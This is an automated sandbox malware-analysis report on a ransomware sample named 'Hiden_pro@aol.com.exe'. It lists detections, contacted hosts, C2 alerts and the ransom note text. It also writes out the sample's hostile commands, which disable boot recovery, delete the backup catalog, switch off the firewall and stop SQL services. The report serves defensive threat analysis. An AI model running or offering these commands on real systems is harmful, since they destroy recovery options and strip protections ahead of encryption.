Hiden_pro@aol.com.exe
This report is generated from a file or URL submitted to this webservice on December 14th 2020 12:44:34 (UTC)
Guest System: Windows 7 64 bit, Professional, 6.1 (build 7601), Service Pack 1
Report generated by Falcon Sandbox v8.45.3 © Hybrid Analysis
Incident Response
Risk Assessment
- Ransomware
  - Detected indicator that file is ransomware
- Spyware
  - Found a string that may be used as part of an injection method
  - POSTs files to a webserver
- Persistence
  - Modifies firewall settings
  - Spawns a lot of processes
  - Tries to suppress failures during boot (often used to hide system changes)
- Evasive
  - Found a Wine emulator related string
  - Possibly tries to implement anti-virtualization techniques
  - The input sample contains a known anti-VM trick
- Network Behavior
  - Contacts 2 domains and 3 hosts.
MITRE ATT&CK™ Techniques Detection
Indicators
Malicious Indicators 12

Anti-Detection/Stealthyness

Tries to suppress failures during boot (often used to hide system changes)
- details
  - Tries to suppress failures during boot "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures"
- source: Monitored Target
- relevance: 8/10
Environment Awareness

Found a Wine emulator related string
- details
  - "wine_get_version" (Indicator: "wine_get_version"; File: "aa4dd8fe831e364b70b4315620bb99ef894a615e3fcdd089968cbc77f9cb73cc.bin")
- source: File/Memory
- relevance: 2/10

The input sample contains a known anti-VM trick
- details
  - Found VM detection artifact "CPUID trick" in "aa4dd8fe831e364b70b4315620bb99ef894a615e3fcdd089968cbc77f9cb73cc.bin" (Offset: 396323)
- source: Binary File
- relevance: 5/10
- ATT&CK ID: T1497
External Systems

Detected Suricata Alert
- details
  - Detected alert "ET USER_AGENTS SFML User-Agent (libsfml-network)" (SID: 2026914, Rev: 1, Severity: 1) categorized as "A Network Trojan was detected"
  - Detected alert "ETPRO MALWARE Zeropadypt/Limbo/Ouroboros Ransomware CnC Checkin M4" (SID: 2839873, Rev: 2, Severity: 1) categorized as "Malware Command and Control Activity Detected" (PUA/PUP/Adware)
- source: Suricata Alerts
- relevance: 10/10

Sample was identified as malicious by a large number of Antivirus engines
- details
  - 44/67 Antivirus vendors marked sample as malicious (65% detection rate)
- source: External System
- relevance: 10/10

Sample was identified as malicious by at least one Antivirus engine
- details
  - 44/67 Antivirus vendors marked sample as malicious (65% detection rate)
- source: External System
- relevance: 8/10
Network Related

Malicious artifacts seen in the context of a contacted host
- details
  - Found malicious artifacts related to "78.47.82.133": ...
    - URL: http://sfml-dev.org/ (AV positives: 1/82 scanned on 12/02/2020 12:46:00)
    - URL: https://www.sfml-dev.org/files/SFML-2.5.1-windows-vc15-64-bit.zip (AV positives: 1/79 scanned on 09/14/2020 16:17:11)
    - URL: https://www.sfml-dev.org/files/SFML-2.3.2-windows-gcc-4.9.2-mingw-64-bit.zip (AV positives: 1/79 scanned on 09/05/2020 07:47:17)
    - URL: https://www.sfml-dev.org/files/SFML-2.5.1-windows-gcc-5.1.0-tdm-32-bit.zip (AV positives: 1/79 scanned on 08/15/2020 18:35:11)
    - URL: https://www.sfml-dev.org/ (AV positives: 1/79 scanned on 08/15/2020 18:10:44)
    - File SHA256: 6b34bffbe34da08657b1e1271389e624e28b7b86dfcdf121e04c4d1d33708144 (Date: 12/11/2020 13:42:21)
    - File SHA256: 4edbf440ba4b005cc2d7b70145e9b8aba4bfb3e5f09027398bf29f4079c8bd6f (Date: 10/30/2020 07:35:55)
    - File SHA256: 353656c5680f40c92830e435de76140493c33008cbdebbaef373081569b5a906 (Date: 10/30/2020 07:35:33)
    - File SHA256: 2fc6f345ecc9bad78b38b62f34884ea1522ec47cb90c2973be3314ae8557023c (Date: 10/30/2020 07:35:18)
    - File SHA256: 5cd6513860a00f0031ed475537a4000e8c1b630c0a6d7b111e566d8caa68ebdf (Date: 10/16/2020 22:49:59)
    - File SHA256: 901f6c65affe93f8ab395464e666e7619fefd8901e4861cda85f7cb333c093cc (AV positives: 1/74 scanned on 05/31/2020 20:25:44)
    - File SHA256: 9e40e72c9cb277b535d5944fbe3dbbd0a5f34aba1d4d7d0e309ffcbfc5c3e1c3 (AV positives: 8/74 scanned on 05/13/2020 03:43:04)
  - Found malicious artifacts related to "104.23.99.190": ...
    - URL: http://pastebin.com/raw/ry1jacf3 (AV positives: 1/83 scanned on 12/14/2020 10:07:09)
    - URL: http://pastebin.com/raw/ZM6QyknC (AV positives: 5/84 scanned on 12/14/2020 10:01:03)
    - URL: http://pastebin.com/raw/3vsJLpWu (AV positives: 5/84 scanned on 12/14/2020 09:59:29)
    - URL: http://pastebin.com/raw/8DEsZn2y (AV positives: 3/84 scanned on 12/14/2020 09:58:14)
    - URL: http://pastebin.com/raw/E4MB4MFj (AV positives: 4/84 scanned on 12/14/2020 09:56:41)
    - File SHA256: 45cdf3d6142467e0059c906996fd3c6d1b038c2affebd54fc5e079d597400236 (AV positives: 5/76 scanned on 12/14/2020 00:32:24)
    - File SHA256: f2b08cbd1324428f7f623f9fde528ecd25880ecf1a0d48e7ed49bf3e5801eef8 (Date: 12/14/2020 12:36:40)
    - File SHA256: c981366934ef62383ebabb3c6bf1336717a7d9158488f3993190412db4fae15f (Date: 12/14/2020 10:26:47)
    - File SHA256: b48480ac54499cc566f1e1c33104948455cf43e70c0d4e23ea5020bc3a059784 (Date: 12/14/2020 10:20:50)
    - File SHA256: b28fceb2d93f8638dadc2e088632558818b2875b13db6d020a7ae8e49f09b1b9 (Date: 12/14/2020 10:19:16)
    - File SHA256: f9c5acf218decfafdafbdcac8fa1b5246538d0b2c4ba78d54ba9ac98fe3aa73d (Date: 12/14/2020 10:13:09)
    - File SHA256: a32e8ed78e0693cc0be76707cb494ae62c2a61bd2562ceaec776417af3479d9e (AV positives: 27/76 scanned on 12/13/2020 19:08:18)
    - File SHA256: cbd9cd5c428646c9f6d1bec79fd7196a16331d0fa3fce9493ad889562824b210 (AV positives: 29/76 scanned on 12/12/2020 07:45:25)
    - File SHA256: 5684fa5e0b0aad1e253dca7cc71b6d5092731d29887a22d65546d84d170dc5e7 (AV positives: 2/75 scanned on 12/10/2020 13:15:03)
    - File SHA256: 8e022f51fa84a28a56b8c5208787019da5b4c0f56d4bf110e78710b988c1511b (AV positives: 5/74 scanned on 12/10/2020 12:25:02)
    - File SHA256: 86c748fd3e05765f3c578523aae17b761bbaba2d1eeb511dc2c047987f182a2c (Date: 11/23/2020 21:20:06)
    - File SHA256: 465900f04ec84c8863b3146bdf1bd730294db81d (Date: 11/23/2020 21:20:06)
    - File SHA256: d3a7538d6b4cb5d7c83aa6c651c9650a (Date: 11/23/2020 21:20:06)
- source: Network Traffic
- relevance: 10/10
Multiple malicious artifacts seen in the context of different hosts
- details
  - Found malicious artifacts related to "78.47.82.133" and "104.23.99.190": the same URL and file-hash list as given under "Malicious artifacts seen in the context of a contacted host" above
- source: Network Traffic
- relevance: 10/10
Uses network protocols on unusual ports
- details
  - TCP traffic to 94.130.46.250 on port 8080
- source: Network Traffic
- relevance: 7/10
- ATT&CK ID: T1065
System Security

Modifies firewall settings
- details
  - Process "netsh.exe" with commandline "netsh advfirewall set currentprofile state off"
  - Process "netsh.exe" with commandline "netsh firewall set opmode mode=disable"
- source: Monitored Target
- relevance: 8/10
- ATT&CK ID: T1089
Unusual Characteristics

Spawns a lot of processes
- details
  - Spawned process "Hiden_pro@aol.com.exe"
  - Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSDTC"
  - Spawned process "net.exe" with commandline "net stop MSDTC"
  - Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSDTC"
  - Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures"
  - Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c bcdedit /set {default} recoveryenabled no"
  - Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c wbadmin delete catalog -quiet"
  - Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLSERVERAGENT"
  - Spawned process "net.exe" with commandline "net stop SQLSERVERAGENT"
  - Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop SQLSERVERAGENT"
  - Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER"
  - Spawned process "net.exe" with commandline "net stop MSSQLSERVER"
  - Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSSQLSERVER"
  - Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop vds"
  - Spawned process "net.exe" with commandline "net stop vds"
  - Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop vds"
  - Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c netsh advfirewall set currentprofile state off"
  - Spawned process "netsh.exe" with commandline "netsh advfirewall set currentprofile state off"
  - Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c netsh firewall set opmode mode=disable"
  - Spawned process "netsh.exe" with commandline "netsh firewall set opmode mode=disable"
  - Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLWriter"
  - Spawned process "net.exe" with commandline "net stop SQLWriter"
  - Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop SQLWriter"
  - Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLBrowser"
  - Spawned process "net.exe" with commandline "net stop SQLBrowser"
  - Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop SQLBrowser"
  - Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER"
  - Spawned process "net.exe" with commandline "net stop MSSQLSERVER"
  - Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSSQLSERVER"
  - Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSSQL$CONTOSO1"
  - Spawned process "net.exe" with commandline "net stop MSSQL$CONTOSO1"
  - Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSSQL$CONTOSO1"
- source: Monitored Target
- relevance: 8/10
Hiding 1 Malicious Indicators
Suspicious Indicators 18

Environment Awareness

Possibly tries to implement anti-virtualization techniques
- details
  - ";r;s99t3Qua3@uES^`F`yj$_F\d|9~duFd9uFdu9uFdd9uFdS9uFdB9uFd19uFd 9uFd9uFdvdjY~dqaY^`[3_^]UQQEMUS]VuW3;tuE Ej"Xf9u3j"Xtffftuf;Etf;Eut3fB}3]f9f;Etf;Euf9tuEuj\EXCf9tj"Xf9j\Xu;u%tj"_f9y}u" (Indicator: "qemu")
- source: File/Memory
- relevance: 4/10
- ATT&CK ID: T1497
External Systems

Detected Suricata Alert
- details
  - Detected alert "ETPRO POLICY External IP Address Lookup via libsfml-network" (SID: 2838021, Rev: 1, Severity: 2) categorized as "Device Retrieving External IP Address Detected"
  - Detected alert "ETPRO INFO HTTP Request with Lowercase connection Header Observed" (SID: 2838131, Rev: 1, Severity: 2) categorized as "Potentially Bad Traffic"
- source: Suricata Alerts
- relevance: 10/10

Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
  - 1/82 reputation engines marked "http://sfml-dev.org" as malicious (1% detection rate)
  - 1/83 reputation engines marked "http://example.com" as malicious (1% detection rate)
- source: External System
- relevance: 10/10
General

POSTs files to a webserver
- details
  - "POST /1614CEEEC50A9336EBF690886CAA747D6811C45D37086A3FA7B11C9E83926C6C HTTP/1.1
    connection: close
    content-length: 1716
    content-type: application/x-www-form-urlencoded
    from: me
    host: 94.130.46.250
    user-agent: libsfml-network/2.x" with no payload
- source: Network Traffic
- relevance: 5/10
Installation/Persistence

Writes data to a remote process
- details
  - "cmd.exe" wrote 32 bytes to a remote process "%WINDIR%\SysWOW64\net.exe" (Handle: 128)
  - "cmd.exe" wrote 52 bytes to a remote process "C:\Windows\SysWOW64\net.exe" (Handle: 128)
  - "cmd.exe" wrote 4 bytes to a remote process "C:\Windows\SysWOW64\net.exe" (Handle: 128)
  - "cmd.exe" wrote 8 bytes to a remote process "C:\Windows\SysWOW64\net.exe" (Handle: 128)
  - "net.exe" wrote 32 bytes to a remote process "C:\Windows\SysWOW64\net1.exe" (Handle: 144)
  - "net.exe" wrote 52 bytes to a remote process "C:\Windows\SysWOW64\net1.exe" (Handle: 144)
  - "net.exe" wrote 4 bytes to a remote process "C:\Windows\SysWOW64\net1.exe" (Handle: 144)
  - "net.exe" wrote 8 bytes to a remote process "C:\Windows\SysWOW64\net1.exe" (Handle: 144)
  - "cmd.exe" wrote 52 bytes to a remote process "C:\Windows\SysWOW64\netsh.exe" (Handle: 128)
  - "cmd.exe" wrote 4 bytes to a remote process "C:\Windows\SysWOW64\netsh.exe" (Handle: 128)
  - "cmd.exe" wrote 8 bytes to a remote process "C:\Windows\SysWOW64\netsh.exe" (Handle: 128)
  - "cmd.exe" wrote 32 bytes to a remote process "C:\Windows\SysWOW64\netsh.exe" (Handle: 128)
- source: API Call
- relevance: 6/10
- ATT&CK ID: T1055
Network Related

Found potential IP address in binary/memory
- details
  - "255.255.255.255"
  - Heuristic match: "127.0.0.1/"
  - "2.5.29.17"
  - Heuristic match: "1.3.14.3.2.26"
  - "2.5.29.18"
  - "2.5.29.19"
  - Heuristic match: "2.16.840.1.101.3.4.2.4"
  - Heuristic match: "2.16.840.1.101.3.4.2.1"
  - Heuristic match: "2.16.840.1.101.3.4.2.2"
  - Heuristic match: "2.16.840.1.101.3.4.2.3"
  - "78.47.82.133"
  - "94.130.46.250"
- source: File/Memory
- relevance: 3/10

Sends traffic on typical HTTP outbound port, but without HTTP header
- details
  - TCP traffic to 78.47.82.133 on port 80 is sent without HTTP header
  - TCP traffic to 104.23.99.190 on port 443 is sent without HTTP header
  - TCP traffic to 94.130.46.250 on port 8080 is sent without HTTP header
- source: Network Traffic
- relevance: 5/10
- ATT&CK ID: T1043
Ransomware/Banking

Detected indicator that file is ransomware
- details
  - "d-color: #cd5b5b; width: 900px; font-size: 15pt; font-family: Arial; font-weight: bolder; border-radius: 10px; } #img{ display: block; width: 100px; height: 100px; text-align: center; margin:0 auto; } </style> <title>lock</title></head><body><img src='https://www.iconsdb.com/icons/preview/red/lock-xxl.png' id='img' ><h1 id='h1'> !!! Your Files Has Been Encrypted !!!</h1><div id='d1'> ♦ your files has been locked with highest secure cryptography algorithm ♦ <br> ♦ there is no way to decrypt your files without paying and buying Decryption tool♦ <br>♦ but after 48 hour decryption price will be double♦ <br>♦ you can send some little files for decryption test♦<br> ♦ test file should not contain valuable data♦<br> ♦ after payment you will get decryption tool ( payment Should be with Bitcoin" (Source: aa4dd8fe831e364b70b4315620bb99ef894a615e3fcdd089968cbc77f9cb73cc.bin, Indicator: "decrypt your files")
- source: File/Memory
- relevance: 7/10

The input sample dropped very many files
- details
  - The input sample dropped 1064 files (often an indicator for ransomware)
- source: Binary File
- relevance: 5/10
System Security

Stops a system service using net.exe
- details
  - Process "net.exe" with commandline "net stop MSDTC" (Service: "Distributed Transaction Coordinator", UID: 00064948-00001108)
  - Process "net.exe" with commandline "net stop SQLSERVERAGENT"
  - Process "net.exe" with commandline "net stop MSSQLSERVER"
  - Process "net.exe" with commandline "net stop vds" (Service: "Virtual Disk", UID: 00065071-00003084)
  - Process "net.exe" with commandline "net stop SQLWriter"
  - Process "net.exe" with commandline "net stop SQLBrowser" (Service: "Computer Browser", UID: 00065330-00000452)
  - Process "net.exe" with commandline "net stop MSSQLSERVER"
  - Process "net.exe" with commandline "net stop MSSQL$CONTOSO1"
- source: Monitored Target
- relevance: 10/10
Unusual Characteristics

Imports suspicious APIs
- details
  - CryptEncrypt
  - GetDriveTypeW
  - GetDriveTypeA
  - FindFirstFileW
  - UnhandledExceptionFilter
  - WriteFile
  - GetModuleFileNameW
  - IsDebuggerPresent
  - GetModuleFileNameA
  - LoadLibraryA
  - LoadLibraryExW
  - CreateThread
  - TerminateProcess
  - GetModuleHandleExW
  - SleepEx
  - CreateToolhelp32Snapshot
  - Process32First
  - LoadLibraryW
  - GetVersionExW
  - GetTickCount
  - VirtualProtect
  - ExitThread
  - Process32Next
  - OpenProcess
  - GetStartupInfoW
  - CreateDirectoryW
  - DeleteFileW
  - GetFileSizeEx
  - FindFirstFileExA
  - FindNextFileW
  - FindNextFileA
  - FindFirstFileExW
  - GetProcAddress
  - CreateFileW
  - CreateFileA
  - GetCommandLineW
  - GetCommandLineA
  - GetModuleHandleA
  - GetModuleHandleW
  - GetFileAttributesExW
  - CreateProcessA
  - Sleep
  - VirtualAlloc
  - accept
  - WSAStartup
  - connect
  - recv
  - send
  - listen
  - closesocket
  - socket
  - bind
  - recvfrom
  - sendto
- source: Static Parser
- relevance: 1/10

Installs hooks/patches the running process
- details
  - "Hiden_pro@aol.com.exe" wrote bytes "c0dfdc771cf9db77ccf8db770d64dd7700000000c011047700000000fc3e047700000000e0130477000000009457537725e0dc77c6e0dc7700000000bc6a527700000000cf3104770000000093195377000000002c32047700000000" to virtual address "0x75741000" (part of module "NSI.DLL")
  - "Hiden_pro@aol.com.exe" wrote bytes "711141027a3b4002ab8b02007f950200fc8c0200729602006cc805001ecd3d027d263d02" to virtual address "0x75A107E4" (part of module "USER32.DLL")
  - "Hiden_pro@aol.com.exe" wrote bytes "7d07e07781edde77ae86dd77c6e0dc77effddf772d16de776014e077478ddd77a8e2dc776089dd7700000000ad376b778b2d6b77b6416b7700000000" to virtual address "0x742D1000" (part of module "WSHTCPIP.DLL")
  - "Hiden_pro@aol.com.exe" wrote bytes "0efcdf7781edde77ae86dd77c6e0dc77effddf772d16de77c0fcdb77da8fe6776014e077478ddd77a8e2dc776089dd7700000000ad376b778b2d6b77b6416b7700000000" to virtual address "0x742E1000" (part of module "WSHIP6.DLL")
  - "cmd.exe" wrote bytes "711141027a3b4002ab8b02007f950200fc8c0200729602006cc805001ecd3d027d263d02" to virtual address "0x75A107E4" (part of module "USER32.DLL")
  - "net.exe" wrote bytes "c0dfdc771cf9db77ccf8db770d64dd7700000000c011047700000000fc3e047700000000e0130477000000009457537725e0dc77c6e0dc7700000000bc6a527700000000cf3104770000000093195377000000002c32047700000000" to virtual address "0x75741000" (part of module "NSI.DLL")
  - "net1.exe" wrote bytes "c0dfdc771cf9db77ccf8db770d64dd7700000000c011047700000000fc3e047700000000e0130477000000009457537725e0dc77c6e0dc7700000000bc6a527700000000cf3104770000000093195377000000002c32047700000000" to virtual address "0x75741000" (part of module "NSI.DLL")
- source: Hook Detection
- relevance: 10/10
- ATT&CK ID: T1179
Hiding 6 Suspicious Indicators

Informative 19
Environment Awareness

Reads the active computer name
- details
  - "net1.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
  - "netsh.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
- source: Registry Access
- relevance: 5/10
- ATT&CK ID: T1012

Reads the cryptographic machine GUID
- details
  - "netsh.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
- source: Registry Access
- relevance: 10/10
- ATT&CK ID: T1012
General

Contacts domains
- details
  - "pastebin.com"
  - "www.sfml-dev.org"
- source: Network Traffic
- relevance: 1/10

Contacts server
- details
  - "78.47.82.133:80"
  - "104.23.99.190:443"
  - "94.130.46.250:8080"
- source: Network Traffic
- relevance: 1/10

Contains PDB pathways
- details
  - "%USERPROFILE%\source\repos\curl\Release\curl.pdb"
  - "D:\CB\ARM_Main\BuildResults\bin\Win32\Release\AdobeARM.pdb" (embedded in a long run of Adobe ARM updater log-message strings and binary data)
- source: File/Memory
- relevance: 1/10

Creates mutants
- details
  - "\Sessions\1\BaseNamedObjects\RasPbFile"
  - "\Sessions\1\BaseNamedObjects\Global\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7"
  - "RasPbFile"
  - "Global\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7"
- source: Created Mutant
- relevance: 3/10

GETs files from a webserver
- details
  - "GET /ip-provider.php HTTP/1.0
    content-length: 0
    from: user@sfml-dev.org
    host: www.sfml-dev.org
    user-agent: libsfml-network/2.x"
- source: Network Traffic
- relevance: 5/10

Overview of unique CLSIDs touched in registry
- details
  - "netsh.exe" touched "Nap Config Read class" (Path: "HKCU\WOW6432NODE\CLSID\{EA4A0A43-1C8F-4C7B-A4B1-28ECBD96BA8C}")
  - "netsh.exe" touched "Quarantine Agent Management class" (Path: "HKCU\WOW6432NODE\CLSID\{EB082BA1-DF8A-46BE-82F3-35BF9E9BE52F}")
  - "netsh.exe" touched "HNetCfg.FwMgr" (Path: "HKCR\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{304CE942-6E39-40D8-943A-B913C40C9CD4}")
- source: Registry Access
- relevance: 3/10

Process launched with changed environment
- details
  - Process "cmd.exe" was launched with new environment variables: "PROCESSOR_ARCHITEW6432="AMD64""
  - Process "cmd.exe" was launched with modified environment variables: "CommonProgramFiles, PROCESSOR_ARCHITECTURE, ProgramFiles"
  - Process "net.exe" was launched with new environment variables: "PROMPT="$P$G""
  - Process "cmd.exe" was launched with missing environment variables: "PROMPT"
  - Process "net.exe" was launched with new environment variables: "PROMPT="$P$G""
  - Process "cmd.exe" was launched with missing environment variables: "PROMPT"
  - Process "net.exe" was launched with new environment variables: "PROMPT="$P$G""
  - Process "cmd.exe" was launched with missing environment variables: "PROMPT"
  - Process "net.exe" was launched with new environment variables: "PROMPT="$P$G""
  - Process "cmd.exe" was launched with missing environment variables: "PROMPT"
Process "netsh.exe" (Show Process) was launched with new environment variables: "PROMPT="$P$G""
Process "cmd.exe" (Show Process) was launched with missing environment variables: "PROMPT"
Process "netsh.exe" (Show Process) was launched with new environment variables: "PROMPT="$P$G""
Process "cmd.exe" (Show Process) was launched with missing environment variables: "PROMPT"
Process "net.exe" (Show Process) was launched with new environment variables: "PROMPT="$P$G""
Process "cmd.exe" (Show Process) was launched with missing environment variables: "PROMPT"
Process "net.exe" (Show Process) was launched with new environment variables: "PROMPT="$P$G""
Process "cmd.exe" (Show Process) was launched with missing environment variables: "PROMPT"
Process "net.exe" (Show Process) was launched with new environment variables: "PROMPT="$P$G""
Process "cmd.exe" (Show Process) was launched with missing environment variables: "PROMPT"
Process "net.exe" (Show Process) was launched with new environment variables: "PROMPT="$P$G"" - source
- Monitored Target
- relevance
- 10/10
-
Runs shell commands
- details
-
"%WINDIR%\system32\cmd.exe /c net stop MSDTC" on 2020-12-14.12:46:29.149
"%WINDIR%\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures" on 2020-12-14.12:46:29.493
"%WINDIR%\system32\cmd.exe /c bcdedit /set {default} recoveryenabled no" on 2020-12-14.12:46:29.665
"%WINDIR%\system32\cmd.exe /c wbadmin delete catalog -quiet" on 2020-12-14.12:46:29.805
"%WINDIR%\system32\cmd.exe /c net stop SQLSERVERAGENT" on 2020-12-14.12:46:29.946
"%WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER" on 2020-12-14.12:46:30.321
"%WINDIR%\system32\cmd.exe /c net stop vds" on 2020-12-14.12:46:31.055
"%WINDIR%\system32\cmd.exe /c netsh advfirewall set currentprofile state off" on 2020-12-14.12:46:31.555
"%WINDIR%\system32\cmd.exe /c netsh firewall set opmode mode=disable" on 2020-12-14.12:47:13.102
"%WINDIR%\system32\cmd.exe /c net stop SQLWriter" on 2020-12-14.12:47:54.665
"%WINDIR%\system32\cmd.exe /c net stop SQLBrowser" on 2020-12-14.12:47:55.133
"%WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER" on 2020-12-14.12:47:55.524
"%WINDIR%\system32\cmd.exe /c net stop MSSQL$CONTOSO1" on 2020-12-14.12:47:56.024 - source
- Monitored Target
- relevance
- 5/10
- ATT&CK ID
- T1059 (Show technique in the MITRE ATT&CK™ matrix)
-
Spawns new processes
- details
-
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSDTC" (Show Process)
Spawned process "net.exe" with commandline "net stop MSDTC" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSDTC" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c bcdedit /set {default} bootstatuspo ..." (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c bcdedit /set {default} recoveryenab ..." (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c wbadmin delete catalog -quiet" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLSERVERAGENT" (Show Process)
Spawned process "net.exe" with commandline "net stop SQLSERVERAGENT" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop SQLSERVERAGENT" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER" (Show Process)
Spawned process "net.exe" with commandline "net stop MSSQLSERVER" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSSQLSERVER" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop vds" (Show Process)
Spawned process "net.exe" with commandline "net stop vds" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop vds" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c netsh advfirewall set currentprofi ..." (Show Process)
Spawned process "netsh.exe" with commandline "netsh advfirewall set currentprofile state off" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c netsh firewall set opmode mode=disa ..." (Show Process)
Spawned process "netsh.exe" with commandline "netsh firewall set opmode mode=disable" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLWriter" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Spawns new processes that are not known child processes
- details
-
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSDTC" (Show Process)
Spawned process "net.exe" with commandline "net stop MSDTC" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSDTC" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c bcdedit /set {default} bootstatuspo ..." (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c bcdedit /set {default} recoveryenab ..." (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c wbadmin delete catalog -quiet" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLSERVERAGENT" (Show Process)
Spawned process "net.exe" with commandline "net stop SQLSERVERAGENT" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop SQLSERVERAGENT" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop MSSQLSERVER" (Show Process)
Spawned process "net.exe" with commandline "net stop MSSQLSERVER" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop MSSQLSERVER" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop vds" (Show Process)
Spawned process "net.exe" with commandline "net stop vds" (Show Process)
Spawned process "net1.exe" with commandline "%WINDIR%\system32\net1 stop vds" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c netsh advfirewall set currentprofi ..." (Show Process)
Spawned process "netsh.exe" with commandline "netsh advfirewall set currentprofile state off" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c netsh firewall set opmode mode=disa ..." (Show Process)
Spawned process "netsh.exe" with commandline "netsh firewall set opmode mode=disable" (Show Process)
Spawned process "cmd.exe" with commandline "%WINDIR%\system32\cmd.exe /c net stop SQLWriter" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Installation/Persistence
-
Dropped files
- details
-
"AutoIt3_x64.exe" has type "data"
"603jOLdO.exe" has type "data"
"AUDIOSEARCHMAIN.DLL" has type "data"
"5F7TBCLUxJG.doc" has type "data"
"AcroRd32.exe" has type "data"
"ACEWDAT.DLL" has type "data"
"Adobe AIR Application Installer.swf" has type "data"
"ant-javafx.jar" has type "data"
"AdobeCollabSync.exe" has type "data"
"AXSLE.dll" has type "data"
"AIDE.dll" has type "data"
"3LnBJn.doc" has type "data"
"ACE.dll" has type "data"
"awt.dll" has type "data"
"7zFM.exe" has type "data"
"4RHcGmkB.exe" has type "data"
"ACEDAO.DLL" has type "data"
"AdobeARM.exe" has type "data"
"ACEES.DLL" has type "data" - source
- Binary File
- relevance
- 3/10
-
Touches files in the Windows directory
- details
-
"Hiden_pro@aol.com.exe" touched file "%WINDIR%\Globalization\Sorting\SortDefault.nls"
"Hiden_pro@aol.com.exe" touched file "%WINDIR%\AppPatch\sysmain.sdb"
"Hiden_pro@aol.com.exe" touched file "%WINDIR%\SysWOW64\cmd.exe"
"cmd.exe" touched file "%WINDIR%\SysWOW64\en-US\cmd.exe.mui"
"cmd.exe" touched file "%WINDIR%\AppPatch\sysmain.sdb"
"cmd.exe" touched file "%WINDIR%\SysWOW64\net.exe"
"cmd.exe" touched file "%WINDIR%\Globalization\Sorting\SortDefault.nls"
"net.exe" touched file "%WINDIR%\AppPatch\sysmain.sdb"
"net.exe" touched file "%WINDIR%\SysWOW64\net1.exe" - source
- API Call
- relevance
- 7/10
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "www.sfml-dev.org"
Heuristic match: "user@sfml-dev.org"
Pattern match: "https://curl.haxx.se/docs/http-cookies.html"
Heuristic match: "ftp@example.com"
